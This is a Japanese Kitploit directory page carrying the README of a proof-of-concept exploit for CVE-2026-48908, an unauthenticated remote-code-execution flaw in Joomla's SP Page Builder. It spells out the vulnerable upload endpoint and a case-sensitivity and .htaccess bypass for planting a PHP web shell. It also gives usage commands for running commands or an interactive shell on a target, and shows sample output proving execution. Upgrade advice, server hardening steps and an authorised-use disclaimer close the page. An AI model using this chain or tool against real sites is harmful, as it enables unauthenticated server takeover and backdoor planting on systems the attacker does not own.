Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-48908 — CVE-2026-48908の概念実証エクスプロイト。Joomla SP Page Builderの任意ファイルアップロードによる未認証RCEで、適応型ペイロード配信とクリーンアップを備えています。 | Kitploit
ツール/GitHubGitHub/bayu06802/cve-2026-48908
脆弱性分析エクスプロイトウェブアプリケーション悪用CTFペネトレーションテスト学習と教育ペイロード開発
GitHubbayu06802/cve-2026-48908

CVE-2026-48908

CVE-2026-48908の概念実証エクスプロイト。Joomla SP Page Builderの任意ファイルアップロードによる未認証RCEで、適応型ペイロード配信とクリーンアップを備えています。

リポジトリを見る
12ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-48908 — SP Page Builder (Joomla) の認証なしRCE

CVE-2026-48908 の概念実証エクスプロイト。これは、JoomShaper による Joomla 用 SP Page Builder コンポーネント (com_sppagebuilder) における深刻な (CVSS 4.0 = 10.0) 認証なしリモートコード実行 (RCE) の脆弱性です。

CVECVE-2026-48908
脆弱性CWE-284 不適切なアクセス制御 → 認証なし任意ファイルアップロード → RCE
コンポーネントJoomla 用 SP Page Builder (com_sppagebuilder)
影響を受けるバージョン1.0.0 – 6.6.1
修正版6.6.2
必要な権限なし(認証前)
ユーザー操作なし

説明

SP Page Builder は、カスタムアイコンフォントパッケージのアップロードを処理するコントローラータスク asset.uploadCustomIcon を公開しています:

root@kitploit:~
index.php?option=com_sppagebuilder&task=asset.uploadCustomIcon

影響を受けるバージョンでは、このタスクは認証なしで、かつ有効なアンチCSRFトークンなしで到達可能です。ZIPアーカイブ(multipartフィールド custom_icon)を受け入れ、その内容をドキュメントルート直下の公開Web配信ディレクトリに展開します:

root@kitploit:~
/media/com_sppagebuilder/assets/iconfont/<name>/   (including the fonts/ subfolder)

アップロードが認証前(pre-auth)に到達可能で、展開されたファイルがWebルートに置かれるため、攻撃者は攻撃者が制御するファイルをブラウズ可能な場所に書き込み、HTTP経由で到達できます。

拡張子フィルターを回避してコード実行を達成する

一部のビルドでは、アーカイブエントリに対してサーバー側のファイル名フィルターが追加されています。このPoCは、以下の3段階のチェーンで一般的な実装を回避します:

  1. 大文字小文字を区別するブロックリスト。 フィルターは小文字の .php, .phtml, .phar, .php3–.php8, .pht, .inc, … を拒否しますが、大文字小文字を正規化しないため、.PHP(およびその他の大文字小文字混在の亜種)と .htaccess は通過します。
  2. 大文字小文字を区別するWebサーバーハンドラー。 デフォルトのApache PHPハンドラー(<FilesMatch "\.php$">)は小文字の .php のみを実行するため、アップロードされた .PHP は最初はソーステキストとして配信され、実行されません。
  3. .htaccess による上書き。 ブロックリストも見逃す .htaccess(AddType application/x-httpd-php .PHP を含む)がペイロードと一緒に配置されます。AllowOverride が許可する場所では、これにより .PHP がPHPとして登録され、アップロードしたシェルが実行されます。

PoCは常に有効なアイコンフォント構造(selection.json, style.css, fonts/<name>.ttf)をパッケージ化してアップロードを受け付けられるようにし、その後シェルを追加します。

適応型 — PHP実行可能な拡張子のリスト(最もフットプリントが小さい順)を試し、次に .htaccess フォールバックを試し、実際にコードが実行された最初の方法で停止します:

  1. 直接の単一ファイルアップロード — 次の各拡張子について fonts/<shell>.<ext> を試行: php, php3, php4, php5, php7, pht, phtml, phar, PHP, pHp, Php。.htaccess なし。 SP Page Builderのフィルターごとにブロックするセットが異なり、Apacheの設定ごとに実行する拡張子も異なるため、対象が許可してかつ実行される組み合わせを見つけます。
  2. fonts/.htaccess + fonts/<shell>.PHP(フォールバック) — 直接の試行がすべて失敗した場合のみ。配置された .htaccess(AddType … .PHP)は、AllowOverride が許可する場所で大文字の .PHP を強制的に実行させます(これは5.4.6スタイルのホストが必要とするものです)。

最初に実行された方法で停止し、どの方法が成功したかを出力します。受け入れられたすべてのアップロードが追跡されるため、--cleanup はすべてを削除します(複数回試行すると書き込み専用ディレクトリが残る可能性があります)。

バージョンとサーバーの堅牢化によって結果は異なり、PoCはそれを明示的に示します(下の結果を参照): 完全なRCE、ファイル書き込みのみ(PHP無効 / AllowOverride None)、パッチ適用済み(管理者のみ)、または脆弱ではない。

要件

root@kitploit:~
pip install -r requirements.txt   # requests

使用方法

root@kitploit:~
# confirm the vulnerability and prove code execution (runs `id`)
python3 sppb_rce.py https://target.example

# run a specific command
python3 sppb_rce.py --url target.example -c "uname -a"

# interactive pseudo-shell
python3 sppb_rce.py https://target.example --shell

# only check; run no command
python3 sppb_rce.py https://target.example --check

# remove the uploaded payload directory afterwards
python3 sppb_rce.py https://target.example --cleanup

ターゲットは位置引数または --url で指定できます。スキーム(http/https)の有無は問いません。

例(サニタイズ済み)

root@kitploit:~
[*] target   : https://target.example
[*] endpoint : index.php?option=com_sppagebuilder&task=asset.uploadCustomIcon
[*] try .php            -> rejected by filter
[*] try .php3           -> rejected by filter
...
[*] try .PHP            -> uploaded, not executed
[*] try .htaccess+.PHP  -> EXECUTED
[+] CODE EXECUTION CONFIRMED via '.htaccess+.PHP' (echo 7*6 -> 42)
[*] running: id
------------------------------------------------------------
uid=33(www-data) gid=33(www-data) groups=33(www-data)
------------------------------------------------------------
[*] cleanup: done (4 dirs)

結果(終了コード付き)

PoCは常にターゲットの判定を出力します:

出力意味終了コード
CODE EXECUTION CONFIRMED via '<method>'脆弱 — 完全な認証なしRCE0
[~] PARTIALLY VULNERABLE — unauth file-write works, but PHP did NOT executeファイル書き込みのみ(AllowOverride None / /media でPHP無効)3
[-] TARGET NOT VULNERABLE — SP Page Builder is patched (6.6.2+)パッチ適用済み — アップロードには管理者認証が必要1
[-] TARGET NOT VULNERABLE — every upload was rejected, or SP Page Builder is absent/patched悪用不可 / コンポーネントが存在しない2

安全機能

  • 配置されたWebシェルは実行ごとにランダムなトークンで保護されており、トークンを持たない誰に対しても 404 を返します — 全世界に開放されたバックドアではありません。
  • --cleanup は作成したペイロードディレクトリを削除します。
  • デフォルトのアクションは無害です(id、算術マーカー)。

対策

  1. SP Page Builder を 6.6.2 以降にアップグレードする(アップロードタスクに認証・認可・CSRFチェックが追加されます)。これが主な修正です。
  2. Webサーバーでの多層防御(Defense-in-depth):
    • アップロードディレクトリ(/media/、/images/、/tmp)でPHP実行を無効にする(FPMプールまたは php_admin_flag engine off を使用)。
    • それらのディレクトリで AllowOverride None を設定し、配置された .htaccess がハンドラーを再有効化できないようにする。
    • アップロード拡張子には大文字小文字を区別しない**許可リスト(allow-list)**を使用し、決してブロックリストを使わない。
  3. 侵害を前提としたレビュー: media/.../iconfont/ 配下の予期しない .php/.PHP、新しいスーパーユーザーアカウント、埋め込まれたファイルマネージャーを探す。

参考情報

  • NVD — CVE-2026-48908
  • CVE.org レコード — CVE-2026-48908
  • 技術解説 — SP Page Builder uploadCustomIcon RCE (mySites.guru)
  • ベンダー — JoomShaper SP Page Builder(6.6.2 のセキュリティ修正)
  • SP Page Builder — Joomla Extensions Directory

キーワード

Joomla SP Page Builder エクスプロイト · com_sppagebuilder 認証なしRCE · CVE-2026-48908 PoC · asset.uploadCustomIcon 任意ファイルアップロード · Joomla リモートコード実行 · ペンテストエクスプロイトスクリプト。

免責事項

このソフトウェアは教育目的および許可を得たセキュリティテスト専用に公開されています。例: 書面による許可を得て実施するペネトレーションテスト、対象をスコープに含むバグバウンティプログラム、CTF大会、および自分自身のラボシステム。

許可なくコンピュータシステムにアクセス、変更、または妨害することは、ほとんどの法域で違法です。あなたは自分の行動に対して単独かつ全面的に責任を負います。 このコードを使用、ダウンロード、または配布することにより、以下に同意したものとみなされます:

  • 自分が所有する、またはテストするための明示的かつ文書化された許可を得ているシステムに対してのみ使用すること。
  • 著作者および貢献者は、このコードの使用または誤用によって生じるいかなる損害、データ損失、サービス停止、法的結果についても一切の責任を負いません。
  • この教材は、明示的または暗黙的を問わず、**いかなる種類の保証もなく「現状のまま(AS IS)」**で提供されます。

これらの条件に同意しない場合は、このソフトウェアを使用しないでください。一般に公開されているエクスプロイト/PoCと同様に、これは防御側が脆弱性を検出・理解・修正できるように善意で共有されています。それをどう使うかはあなた次第です。

ライセンス

MIT — LICENSE を参照してください。

ツールをダウンロード